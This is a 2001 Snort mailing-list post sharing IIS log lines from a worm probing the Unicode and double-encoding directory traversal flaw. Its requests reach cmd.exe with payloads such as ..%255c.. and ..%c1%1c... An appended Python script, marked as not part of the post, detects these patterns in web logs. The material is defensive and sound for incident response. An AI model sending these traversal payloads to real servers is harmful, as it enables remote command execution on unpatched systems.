[Snort-users] WEB-IIS Cmd attack

Erek Adams erek at ...577...
Tue Sep 18 09:10:02 EDT 2001


On Tue, 18 Sep 2001, cdowns wrote:

> What is the actual signature as I have seen nothing yet on my servers in
> NH

Give it time, give it time....

What I'm seeing is the following:

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:24 -0700] "GET /c/winnt/system32/cmd.exe?
/c+dir HTTP/1.0" 404 297 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:24 -0700] "GET /d/winnt/system32/cmd.exe?
/c+dir HTTP/1.0" 404 297 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /scripts/..%255c../winnt
/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /_vti_bin/..%255c..
/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /_mem_bin/..%255c..
/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /msadc/..%255c../..%255c..
/..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 344 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:37 -0700] "GET /scripts/..%c1%1c../winnt
/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-"

And repeats, ad nauseam.

There are some others, but basically still just your standard unicode string
attack.

Damn...  This one looks worse than CR.  *sigh*

-----
Erek Adams
Nifty-Type-Guy
TheAdamsFamily.Net
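An added detector for the log lines above; it is not part of this post and not a Snort rule. It normalizes the request path the way the lenient IIS decoder did (percent-decoding repeated until stable, so %255c collapses to a backslash, and overlong UTF-8 pairs such as %c1%1c mapped to separators) and flags traversal plus cmd.exe requests. The sample lines are constructed after the ones quoted above, the Apache common-log regex and the OVERLONG table are my assumptions, and the table is not exhaustive.

```python
import re
from urllib.parse import unquote

# Constructed sample lines, modelled on the ones quoted in the post; the last is benign.
SAMPLE_LOG = """\
xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:24 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:37 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-"
10.0.0.5 - - [18/Sep/2001:09:05:00 -0700] "GET /index.html HTTP/1.0" 200 1043 "-" "-"
"""
# Apache common-log prefix: client, ident, user, [timestamp], "request line", status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<url>\S+) [^"]*" (?P<status>\d{3})')
# Overlong UTF-8 pairs the old IIS decoder accepted as path separators (assumed list, not exhaustive).
OVERLONG = {"%c0%af": "/", "%c1%1c": "\\", "%c1%9c": "\\"}

def normalize_path(url: str) -> str:
    # Decode like a lenient server: map overlong pairs, percent-decode until stable
    # (%255c -> %5c -> '\' needs two rounds), then treat backslash as a separator.
    path = url.split("?", 1)[0].lower()
    prev = None
    while prev != path:
        prev = path
        for seq, ch in OVERLONG.items():
            path = path.replace(seq, ch)
        path = unquote(path)
    return path.replace("\\", "/")

def classify(url: str) -> list[str]:
    # Reasons a request matches the cmd.exe traversal probe; empty list means benign.
    norm, raw, reasons = normalize_path(url), url.lower(), []
    if "/../" in norm:
        reasons.append("traversal")
    if norm.endswith("/cmd.exe"):
        reasons.append("cmd.exe")
    if "%25" in raw:
        reasons.append("double-encoding")
    if any(seq in raw for seq in OVERLONG):
        reasons.append("overlong-utf8")
    return reasons

def scan_log(text: str) -> list[dict]:
    # Keep lines that trip at least one rule; a 200 on such a request means the probe
    # reached a live cmd.exe, the 404s in the post mean it did not.
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (reasons := classify(m["url"])):
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                         "url": m["url"], "reasons": reasons})
    return hits
```

Run `scan_log(SAMPLE_LOG)` to get one record per matching line; checking the status field separates failed probes from ones a vulnerable server actually served.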